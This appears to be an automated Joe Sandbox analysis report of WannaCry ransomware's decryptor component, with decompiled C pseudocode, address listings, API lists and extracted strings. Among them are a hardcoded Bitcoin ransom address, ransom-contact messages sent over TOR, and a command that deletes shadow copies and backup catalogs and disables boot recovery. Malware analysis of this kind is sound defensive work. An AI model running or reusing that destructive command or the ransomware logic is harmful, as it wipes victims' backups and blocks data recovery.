																__eflags = 1;
																if(1 != 0) {
																	_t307 =  *((intOrPtr*)(_t343 + _t329));
																	_t343 = _t343 + 4;
																	__eflags = 0 << 8;
																	_t204 = E00411B50(_t307, 0 << 8 << 8);
																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
																	 *(_t346 + 0x10c) = _t204;
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x110)) = 0;
																}
																__eflags = _t276;
																if(_t276 != 0) {
																	 *(_t346 + 0x114) = E00411B50( *((intOrPtr*)(_t343 + _t329)), 0 << 8 << 8);
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x118)) = 0;
																}
															} else {
																goto L60;
															}
															goto L69;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L59;
														L60:
														_t341 = _t341 + 4;
														__eflags = _t341 + 4 -  *((intOrPtr*)(_t356 + 0x14));
													} while (_t341 + 4 <  *((intOrPtr*)(_t356 + 0x14)));
												}
												L69:
												__eflags = _t329;
												if(_t329 != 0) {
													_push(_t329);
													L00412C98();
													_t356 = _t356 + 4;
												}
												_t182 =  *((intOrPtr*)(_t356 + 0x20));
												memcpy(_t182 + 8, _t346, 0x4b << 2);
												 *((intOrPtr*)(_t182 + 0x134)) =  *((intOrPtr*)(_t356 + 0x2a0));
												__eflags = 0;
												return 0;
												goto L73;
											}
										} else {
											_push(_t313);
											L00412C98();
											return 0x800;
										}
									} else {
										return 0x800;
									}
								} else {
									return 0x700;
								}
							} else {
								goto L8;
							}
						} else {
							if(_t312 == _t232) {
								L8:
								_t226 =  *((intOrPtr*)(_t348 + 0x28c));
								 *_t226 =  *((intOrPtr*)( *_t336 + 4));
								 *((char*)(_t226 + 4)) = 0;
								 *((intOrPtr*)(_t226 + 0x108)) = 0;
								 *((intOrPtr*)(_t226 + 0x10c)) = 0;
								 *((intOrPtr*)(_t226 + 0x110)) = 0;
								 *((intOrPtr*)(_t226 + 0x114)) = 0;
								 *((intOrPtr*)(_t226 + 0x118)) = 0;
								 *((intOrPtr*)(_t226 + 0x11c)) = 0;
								 *((intOrPtr*)(_t226 + 0x120)) = 0;
								 *((intOrPtr*)(_t226 + 0x124)) = 0;
								 *((intOrPtr*)(_t226 + 0x128)) = 0;
								__eflags = 0;
								return 0;
							} else {
								return memcpy( *(_t348 + 0x298), _t336 + 8, 0x4b << 2);
							}
						}
					}
				}
				L73:
			}





























































                                  0x00411cf9
                                  0x00411d00
                                  0x00411d03
                                  0x00411d07
                                  0x00411d0b
                                  0x00412233
                                  0x0041223f
                                  0x00411d11
                                  0x00411d11
                                  0x00411d16
                                  0x00000000
                                  0x00411d1c
                                  0x00411d1f
                                  0x00411d22
                                  0x00411d27
                                  0x00411d27
                                  0x00411d30
                                  0x00411d35
                                  0x00411d5a
                                  0x00411d5c
                                  0x00411db5
                                  0x00411db7
                                  0x00411dba
                                  0x00411dbd
                                  0x00411dc2
                                  0x00411dc2
                                  0x00411dc5
                                  0x00411dc7
                                  0x00411dca
                                  0x00411dcd
                                  0x00411dd2
                                  0x00411dd4
                                  0x00411dd7
                                  0x00411dd7
                                  0x00411df9
                                  0x00411e10
                                  0x00411e15
                                  0x00411e18
                                  0x00411e1a
                                  0x00411e39
                                  0x00411e3e
                                  0x00411e41
                                  0x00411e43
                                  0x00411e56
                                  0x00411e5a
                                  0x00411e5b
                                  0x00411e62
                                  0x00411e68
                                  0x00411e73
                                  0x00411e7c
                                  0x00411e7f
                                  0x00411e81
                                  0x00411eae
                                  0x00411eb7
                                  0x00411eb9
                                  0x00411ebd
                                  0x00411ec9
                                  0x00411ecd
                                  0x00411ed4
                                  0x00411ed4
                                  0x00411ed7
                                  0x00411ed7
                                  0x00411ed9
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00411ee6
                                  0x00411ee6
                                  0x00411ee9
                                  0x00411eeb
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411ee4
                                  0x00411ee0
                                  0x00411ef0
                                  0x00411ef0
                                  0x00411ef2
                                  0x00411ef4
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411ee4
                                  0x00411ee0
                                  0x00411ef7
                                  0x00411ef9
                                  0x00411efb
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411ee4
                                  0x00411ee0
                                  0x00411efe
                                  0x00411f03
                                  0x00411f04
                                  0x00411f09
                                  0x00411f0c
                                  0x00411f0e
                                  0x00411f10
                                  0x00411f10
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411ee4
                                  0x00411ee0
                                  0x00411f15
                                  0x00411f1a
                                  0x00411f1b
                                  0x00411f20
                                  0x00411f23
                                  0x00411f25
                                  0x00411f27
                                  0x00411f27
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411ee4
                                  0x00411ee0
                                  0x00411f2c
                                  0x00411f31
                                  0x00411f32
                                  0x00411f37
                                  0x00411f3a
                                  0x00411f3c
                                  0x00411f3e
                                  0x00411f3e
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411ee4
                                  0x00000000
                                  0x00411ee0
                                  0x00411f43
                                  0x00411f48
                                  0x00411f49
                                  0x00411f4e
                                  0x00411f51
                                  0x00411f53
                                  0x00411f55
                                  0x00411f55
                                  0x00000000
                                  0x00411f55
                                  0x00411f5f
                                  0x00411f6a
                                  0x00411f6e
                                  0x00411f75
                                  0x00411f75
                                  0x00411f7e
                                  0x00411f83
                                  0x00411f83
                                  0x00411f93
                                  0x00411f95
                                  0x00411f98
                                  0x00411f98
                                  0x00411f9b
                                  0x00411fa0
                                  0x00411fa2
                                  0x00411fb3
                                  0x00411fbb
                                  0x00411fbe
                                  0x00411fc9
                                  0x00411fd5
                                  0x00411fd7
                                  0x00411fd7
                                  0x00411fda
                                  0x00411fa4
                                  0x00411fa4
                                  0x00411fa7
                                  0x00000000
                                  0x00411fa9
                                  0x00411fa9
                                  0x00411fac
                                  0x00000000
                                  0x00411fae
                                  0x00411fae
                                  0x00411fb1
                                  0x00000000
                                  0x00000000
                                  0x00411fb1
                                  0x00411fac
                                  0x00411fa7
                                  0x00411fdc
                                  0x00411fde
                                  0x00411fe0
                                  0x00411fe6
                                  0x00411fe8
                                  0x00411fe8
                                  0x00411ff2
                                  0x00411ff4
                                  0x00411ffc
                                  0x00411ffc
                                  0x00411ffe
                                  0x00411ffe
                                  0x00412008
                                  0x0041200a
                                  0x00412012
                                  0x00412012
                                  0x00412014
                                  0x00412014
                                  0x0041201a
                                  0x0041201c
                                  0x00412024
                                  0x00412024
                                  0x00412026
                                  0x00412026
                                  0x00412035
                                  0x00412037
                                  0x00412039
                                  0x00412039
                                  0x00412039
                                  0x00412039
                                  0x00412043
                                  0x00412047
                                  0x00412058
                                  0x0041205e
                                  0x00412063
                                  0x00412066
                                  0x00412074
                                  0x00412078
                                  0x0041207e
                                  0x00412082
                                  0x00412086
                                  0x0041208c
                                  0x00412092
                                  0x0041209c
                                  0x0041209e
                                  0x004120a4
                                  0x004120aa
                                  0x004120b0
                                  0x004121f2
                                  0x004120b6
                                  0x004120b6
                                  0x004120ba
                                  0x004120bf
                                  0x004120c6
                                  0x004120ca
                                  0x004120ce
                                  0x004120d3
                                  0x004120d7
                                  0x004120d7
                                  0x004120d9
                                  0x004120db
                                  0x004120dd
                                  0x00000000
                                  0x00000000
                                  0x004120df
                                  0x004120e1
                                  0x004120f7
                                  0x004120f7
                                  0x004120e3
                                  0x004120e3
                                  0x004120e6
                                  0x004120e8
                                  0x004120e8
                                  0x004120eb
                                  0x00000000
                                  0x004120ed
                                  0x004120ed
                                  0x004120f0
                                  0x004120f3
                                  0x004120f5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004120f5
                                  0x004120eb
                                  0x00412100
                                  0x00412100
                                  0x00412102
                                  0x00412120
                                  0x00412124
                                  0x00412133
                                  0x00412136
                                  0x00412138
                                  0x0041213c
                                  0x00412150
                                  0x00412153
                                  0x0041215e
                                  0x00412161
                                  0x00412166
                                  0x0041216a
                                  0x00412170
                                  0x00412173
                                  0x00412173
                                  0x00412179
                                  0x0041217b
                                  0x0041218f
                                  0x00412192
                                  0x0041219d
                                  0x004121a0
                                  0x004121a5
                                  0x004121a9
                                  0x004121af
                                  0x004121b2
                                  0x004121b2
                                  0x004121b8
                                  0x004121ba
                                  0x004121e1
                                  0x004121e7
                                  0x004121ea
                                  0x004121ea
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00412102
                                  0x004120fb
                                  0x004120fd
                                  0x00000000
                                  0x00412104
                                  0x0041210e
                                  0x00412115
                                  0x00412115
                                  0x00412119
                                  0x004121f6
                                  0x004121f6
                                  0x004121f8
                                  0x004121fa
                                  0x004121fb
                                  0x00412200
                                  0x00412200
                                  0x00412203
                                  0x00412214
                                  0x0041221f
                                  0x00412225
                                  0x0041222e
                                  0x00000000
                                  0x0041222e
                                  0x00411e83
                                  0x00411e83
                                  0x00411e84
                                  0x00411e9a
                                  0x00411e9a
                                  0x00411e47
                                  0x00411e53
                                  0x00411e53
                                  0x00411e1e
                                  0x00411e2a
                                  0x00411e2a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411d37
                                  0x00411d39
                                  0x00411d5e
                                  0x00411d66
                                  0x00411d6d
                                  0x00411d71
                                  0x00411d74
                                  0x00411d7a
                                  0x00411d80
                                  0x00411d86
                                  0x00411d8c
                                  0x00411d92
                                  0x00411d98
                                  0x00411d9e
                                  0x00411da4
                                  0x00411daa
                                  0x00411db2
                                  0x00411d3b
                                  0x00411d57
                                  0x00411d57
                                  0x00411d39
                                  0x00411d35
                                  0x00411d16
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: /../$/..\$\../$\..\
                                  • API String ID: 0-3885502717
                                  • Opcode ID: 2a7b4835dbee33ff67917d53809c18ea5066a20c5d79c717924bcce35cecf77d
                                  • Instruction ID: 7e1d0207c54717434a39a3e8c1400c014a600b9e0d7efc558eb6bad2cf7342ef
                                  • Opcode Fuzzy Hash: 2a7b4835dbee33ff67917d53809c18ea5066a20c5d79c717924bcce35cecf77d
                                  • Instruction Fuzzy Hash: FAF138756043414FC724CF2888817EBBBE1ABD8304F18892EEDD9CB351D679E989C799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DB80 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • recv.WS2_32(?,?,?,00000000), ref: 0040DB91
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: recv
                                  • String ID:
                                  • API String ID: 1507349165-0
                                  • Opcode ID: 1d9f9cd7d87b293edf20ef63389b80cde037e3ff80316bdb179f77fce595cd06
                                  • Instruction ID: 7776e5be7928a6c2c2562dd3bb1774681ff5e82bf649542f35cb965541f1d725
                                  • Opcode Fuzzy Hash: 1d9f9cd7d87b293edf20ef63389b80cde037e3ff80316bdb179f77fce595cd06
                                  • Instruction Fuzzy Hash: 0BC04CB9204300FFD204CB10CD85F6BB7A9EBD4711F10C90DB98D86254C670EC10DA65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004082C0 Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 181fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 56%
                                  			E004082C0(void* __ecx) {
				void* __ebp;
				signed int _t44;
				void* _t45;
				void* _t47;
				signed int _t48;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t59;
				void* _t60;
				signed int _t65;
				signed int _t90;
				signed int _t91;
				signed int _t104;
				intOrPtr* _t106;
				struct _IO_FILE* _t107;
				signed int _t108;
				void* _t111;
				intOrPtr _t114;
				void* _t115;
				void* _t116;
				void* _t118;
				void* _t120;

				_push(0xffffffff);
				_push(E00413FCE);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t114;
				_t115 = _t114 - 0x8c;
				_t111 = __ecx;
				 *((intOrPtr*)(_t115 + 0xa4)) = 0;
				_t44 =  *( *((intOrPtr*)(_t115 + 0xac)) - 8);
				if(_t44 > 0x3e8) {
					_push(0x3e8);
					_push(0);
					_push(_t115 + 0x14);
					L00412F6E();
					_push(_t44);
					 *((char*)(_t115 + 0xa8)) = 1;
					L00412D9A();
					 *((char*)(_t115 + 0xa4)) = 0;
					L00412CC2();
				}
				if( *( *((intOrPtr*)(_t115 + 0xac)) - 8) >= 0xa) {
					_t106 = __imp__time;
					_t45 =  *_t106(0);
					_t90 =  *0x4218a8; // 0x0
					_t116 = _t115 + 4;
					__eflags = _t45 - _t90 - 0xb4;
					if(_t45 - _t90 >= 0xb4) {
						L13:
						_t47 =  *_t106(0);
						_t91 =  *0x4218a8; // 0x0
						_t116 = _t116 + 4;
						_t48 = _t47 - _t91;
						__eflags = _t48 - 0xe10;
						if(_t48 <= 0xe10) {
							L9:
							__eflags =  *0x4218ac - 3; // 0x0
							if(__eflags < 0) {
								L15:
								 *((intOrPtr*)(_t116 + 0x14)) = 0;
								memset(_t116 + 0x18, 0, 0x21 << 2);
								_t51 = fopen("00000000.res", "rb"); // executed
								_t107 = _t51;
								_t118 = _t116 + 0x14;
								__eflags = _t107;
								if(_t107 != 0) {
									fread(_t118 + 0x1c, 0x88, 1, _t107); // executed
									fclose(_t107);
									E0040BE90("s.wnry", _t111 + 0x6ea, _t111 + 0x74e);
									_push(0);
									_push( *((intOrPtr*)(_t118 + 0xcc)));
									_push(_t118 + 0x38);
									_push(_t111 + 0x5f0);
									_t56 = E0040C060( *((intOrPtr*)(_t118 + 0xcc)), __eflags);
									_t118 = _t118 + 0x30;
									_t108 = _t56;
									E0040C670();
									_t58 =  *(_t118 + 0xb0);
									__eflags = _t108;
									if(_t108 < 0) {
										__eflags = _t58;
										if(_t58 != 0) {
											_push(0);
											_push(0x30);
											_push("Failed to send your message!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
											L00412CC8();
										}
									} else {
										__eflags = _t58;
										if(_t58 != 0) {
											L00412CC8();
											__imp__time(0, "Your message has been sent successfully!", 0x40, 0);
											_t118 = _t118 + 4;
											 *0x4218a8 = _t58;
										}
									}
									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
									L00412CC2();
									_t59 = _t108;
								} else {
									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
									L00412CC2();
									_t59 = _t51 | 0xffffffff;
								}
								L23:
								 *[fs:0x0] =  *((intOrPtr*)(_t118 + 0x9c));
								return _t59;
							}
							__eflags =  *(_t116 + 0xb0);
							if( *(_t116 + 0xb0) != 0) {
								L00412DA6();
								 *((char*)(_t116 + 0xa8)) = 2;
								_t60 =  *_t106(0);
								_t104 =  *0x4218a8; // 0x0
								_t120 = _t116 + 4;
								__eflags = 0x3d;
								_push(0x3d - ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5) + ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5 >> 0x1f));
								_push("You are sending too many mails! Please try again %d minutes later.");
								_push(_t120 + 0x10);
								L00412E00();
								_t48 =  *(_t120 + 0x1c);
								_t116 = _t120 + 0xc;
								_push(0);
								_push(0);
								_push(_t48);
								L00412CC8();
								 *((char*)(_t116 + 0xa4)) = 0;
								L00412CC2();
							}
							 *((intOrPtr*)(_t116 + 0xa4)) = 0xffffffff;
							L00412CC2();
							_t59 = _t48 | 0xffffffff;
							goto L23;
						}
						 *0x4218ac = 0;
						goto L15;
					}
					_t65 =  *0x4218ac; // 0x0
					__eflags = _t65 - 3;
					if(_t65 >= 3) {
						goto L13;
					}
					_t48 = _t65 + 1;
					__eflags = _t48;
					 *0x4218ac = _t48;
					goto L9;
				}
				if( *((intOrPtr*)(_t115 + 0xb0)) != 0) {
					_push(0);
					_push(0);
					_push("Too short message!");
					L00412CC8();
				}
				 *((intOrPtr*)(_t115 + 0xa4)) = 0xffffffff;
				L00412CC2();
				_t59 = _t44 | 0xffffffff;
				goto L23;
			}


























                                  0x004082c0
                                  0x004082c2
                                  0x004082cd
                                  0x004082ce
                                  0x004082d5
                                  0x004082df
                                  0x004082ea
                                  0x004082f1
                                  0x004082f9
                                  0x004082fb
                                  0x00408304
                                  0x00408305
                                  0x0040830d
                                  0x00408312
                                  0x0040831a
                                  0x00408322
                                  0x0040832b
                                  0x00408332
                                  0x00408332
                                  0x00408342
                                  0x00408378
                                  0x0040837f
                                  0x00408381
                                  0x00408387
                                  0x00408391
                                  0x00408396
                                  0x0040844d
                                  0x0040844e
                                  0x00408450
                                  0x00408456
                                  0x00408459
                                  0x0040845b
                                  0x00408460
                                  0x004083af
                                  0x004083af
                                  0x004083b5
                                  0x0040846c
                                  0x00408477
                                  0x00408485
                                  0x00408487
                                  0x0040848d
                                  0x0040848f
                                  0x00408492
                                  0x00408494
                                  0x004084c2
                                  0x004084c9
                                  0x004084e2
                                  0x004084ee
                                  0x004084f3
                                  0x004084fa
                                  0x004084fb
                                  0x004084fc
                                  0x00408501
                                  0x00408504
                                  0x00408506
                                  0x0040850b
                                  0x00408512
                                  0x00408514
                                  0x00408538
                                  0x0040853a
                                  0x0040853c
                                  0x0040853d
                                  0x0040853f
                                  0x00408544
                                  0x00408544
                                  0x00408516
                                  0x00408516
                                  0x00408518
                                  0x00408522
                                  0x00408528
                                  0x0040852e
                                  0x00408531
                                  0x00408531
                                  0x00408518
                                  0x00408550
                                  0x0040855b
                                  0x00408560
                                  0x00408496
                                  0x0040849d
                                  0x004084a8
                                  0x004084ad
                                  0x004084ad
                                  0x00408562
                                  0x0040856d
                                  0x0040857a
                                  0x0040857a
                                  0x004083bb
                                  0x004083c2
                                  0x004083c8
                                  0x004083ce
                                  0x004083d6
                                  0x004083d8
                                  0x004083f5
                                  0x004083fd
                                  0x00408403
                                  0x00408404
                                  0x00408409
                                  0x0040840a
                                  0x0040840f
                                  0x00408413
                                  0x00408416
                                  0x00408417
                                  0x00408418
                                  0x00408419
                                  0x00408422
                                  0x00408429
                                  0x00408429
                                  0x00408435
                                  0x00408440
                                  0x00408445
                                  0x00000000
                                  0x00408445
                                  0x00408466
                                  0x00000000
                                  0x00408466
                                  0x0040839c
                                  0x004083a1
                                  0x004083a3
                                  0x00000000
                                  0x00000000
                                  0x004083a9
                                  0x004083a9
                                  0x004083aa
                                  0x00000000
                                  0x004083aa
                                  0x0040834b
                                  0x0040834d
                                  0x0040834e
                                  0x0040834f
                                  0x00408354
                                  0x00408354
                                  0x00408360
                                  0x0040836b
                                  0x00408370
                                  0x00000000

                                  APIs
                                  • #4278.MFC42(000003E8,00000000,000003E8,?,?,75F15C80), ref: 0040830D
                                  • #858.MFC42 ref: 00408322
                                  • #800.MFC42 ref: 00408332
                                  • #1200.MFC42(Too short message!,00000000,00000000,?,?,75F15C80), ref: 00408354
                                  • #800.MFC42 ref: 0040836B
                                  • time.MSVCRT ref: 0040837F
                                  • #540.MFC42 ref: 004083C8
                                  • time.MSVCRT ref: 004083D6
                                  • #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
                                  • #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
                                  • #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
                                  • #800.MFC42 ref: 00408440
                                  • time.MSVCRT ref: 0040844E
                                  • fopen.MSVCRT ref: 00408487
                                  • #800.MFC42 ref: 004084A8
                                  • fread.MSVCRT ref: 004084C2
                                  • fclose.MSVCRT ref: 004084C9
                                  • #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
                                  • time.MSVCRT ref: 00408528
                                  • #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
                                  • #800.MFC42 ref: 0040855B
                                  Strings
                                  • Too short message!, xrefs: 0040834F
                                  • Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 0040853F
                                  • You are sending too many mails! Please try again %d minutes later., xrefs: 00408404
                                  • 00000000.res, xrefs: 00408480
                                  • s.wnry, xrefs: 004084DD
                                  • Your message has been sent successfully!, xrefs: 0040851D
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#1200time$#2818#4278#540#858fclosefopenfread
                                  • String ID: 00000000.res$Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$Too short message!$You are sending too many mails! Please try again %d minutes later.$Your message has been sent successfully!$s.wnry
                                  • API String ID: 1233543560-382338106
                                  • Opcode ID: 6aef2977620d67d742a0f30d3b6c329b2d4c4f80cce0edf1bcad665571c82898
                                  • Instruction ID: 9ef4e74ff6f5855000ff98dc085b89da37e67c7abdef0d08bf307c22ead08a72
                                  • Opcode Fuzzy Hash: 6aef2977620d67d742a0f30d3b6c329b2d4c4f80cce0edf1bcad665571c82898
                                  • Instruction Fuzzy Hash: D6610371604340EFD330EB28DD81BEFB795AB90324F444A3EF199932D0DB78594586AB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004064D0 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 256stringwindowtimeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 71%
                                  			E004064D0(intOrPtr __ecx, void* __fp0) {
				char _v1032;
				char _v1424;
				void _v2256;
				void _v2456;
				void _v2707;
				char _v2708;
				intOrPtr _v2720;
				short _v2724;
				int _t48;
				int _t49;
				intOrPtr* _t50;
				intOrPtr _t60;
				intOrPtr _t63;
				intOrPtr _t66;
				short _t70;
				void* _t82;
				char* _t87;
				char* _t89;
				intOrPtr _t90;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t105;
				char _t122;
				intOrPtr _t134;
				intOrPtr _t135;
				intOrPtr _t136;
				intOrPtr* _t140;
				intOrPtr* _t141;
				intOrPtr* _t142;
				intOrPtr* _t161;
				intOrPtr* _t162;
				intOrPtr* _t163;
				void* _t165;
				void* _t167;
				intOrPtr* _t168;
				void* _t169;
				void* _t170;
				void* _t171;
				void* _t201;

				_t201 = __fp0;
				_t90 = __ecx; // executed
				L00412CB0(); // executed
				SendMessageA( *(__ecx + 0x20), 0x80, 1,  *(__ecx + 0x82c)); // executed
				SendMessageA( *(_t90 + 0x20), 0x80, 0,  *(_t90 + 0x82c)); // executed
				_t48 = E00401C70(0);
				_t170 = _t169 + 4;
				if(_t48 == 0) {
					_t122 =  *0x421798; // 0x0
					_v2708 = _t122;
					memset( &_v2707, _t48, 0x40 << 2);
					asm("stosw");
					asm("stosb");
					GetModuleFileNameA(0,  &_v2708, 0x104);
					_t87 = strrchr( &_v2708, 0x5c);
					_t170 = _t170 + 0x14;
					if(_t87 != 0) {
						_t89 = strrchr( &_v2708, 0x5c);
						_t170 = _t170 + 8;
						 *_t89 = 0;
					}
					SetCurrentDirectoryA( &_v2708);
				}
				_t167 = _t90 + 0x50c;
				_t49 = E00401A10(_t167, 1);
				_t171 = _t170 + 8;
				if(_t49 == 0) {
					memset(_t167, _t49, 0xc3 << 2);
					asm("repne scasb");
					_t165 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94";
					_t82 = memcpy(_t165 + 0x175b75a, _t165, memcpy(_t90 + 0x5be, _t165, 0 << 2) & 0x00000003);
					 *((intOrPtr*)(_t90 + 0x584)) = 0x43960000;
					 *(_t90 + 0x588) = 0;
					__imp__time(0);
					 *(_t90 + 0x578) = _t82;
					E00401A10(_t167, 0);
					_t171 = _t171 + 0x30;
				}
				_t50 = E00402C40();
				__imp__#115(0x202,  &_v1424); // executed
				__imp____p___argc();
				if( *_t50 > 1) {
					_t168 = __imp____p___argv;
					_t140 = "fi";
					_t161 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
					while(1) {
						_t98 =  *_t161;
						_t60 = _t98;
						if(_t98 !=  *_t140) {
							break;
						}
						if(_t60 == 0) {
							L12:
							_t60 = 0;
						} else {
							_t136 =  *((intOrPtr*)(_t161 + 1));
							_t22 = _t140 + 1; // 0x31000069
							_t60 = _t136;
							if(_t136 !=  *_t22) {
								break;
							} else {
								_t161 = _t161 + 2;
								_t140 = _t140 + 2;
								if(_t60 != 0) {
									continue;
								} else {
									goto L12;
								}
							}
						}
						L14:
						if(_t60 == 0) {
							E00407F80(_t90);
							ExitProcess(0);
						}
						_t141 = "co";
						_t162 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
						while(1) {
							_t99 =  *_t162;
							_t63 = _t99;
							if(_t99 !=  *_t141) {
								break;
							}
							if(_t63 == 0) {
								L21:
								_t63 = 0;
							} else {
								_t135 =  *((intOrPtr*)(_t162 + 1));
								_t25 = _t141 + 1; // 0x6600006f
								_t63 = _t135;
								if(_t135 !=  *_t25) {
									break;
								} else {
									_t162 = _t162 + 2;
									_t141 = _t141 + 2;
									if(_t63 != 0) {
										continue;
									} else {
										goto L21;
									}
								}
							}
							L23:
							if(_t63 == 0) {
								E004080C0(_t90);
								ExitProcess(0);
							}
							_t142 = "vs";
							_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
							while(1) {
								_t100 =  *_t163;
								_t66 = _t100;
								if(_t100 !=  *_t142) {
									break;
								}
								if(_t66 == 0) {
									L30:
									_t66 = 0;
								} else {
									_t134 =  *((intOrPtr*)(_t163 + 1));
									_t28 = _t142 + 1; // 0x63000073
									_t66 = _t134;
									if(_t134 !=  *_t28) {
										break;
									} else {
										_t163 = _t163 + 2;
										_t142 = _t142 + 2;
										if(_t66 != 0) {
											continue;
										} else {
											goto L30;
										}
									}
								}
								L32:
								if(_t66 == 0) {
									Sleep(0x2710);
									memset( &_v2256, memcpy( &_v2456, "/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet", 0x32 << 2), 0xce << 2);
									_t70 = "cmd.exe"; // 0x2e646d63
									_t105 =  *0x420fd4; // 0x657865
									_v2724 = _t70;
									_v2720 = _t105;
									if(E00401BB0() != 0) {
										_push( &_v2456);
										_push( &_v2724);
										sprintf( &_v1032, "%s %s");
										E00401A90( &_v1032, 0, 0);
									} else {
										E00401B50( &_v2724,  &_v2456, _t71);
									}
									ExitProcess(0);
								}
								goto L37;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L32;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L23;
					}
					asm("sbb eax, eax");
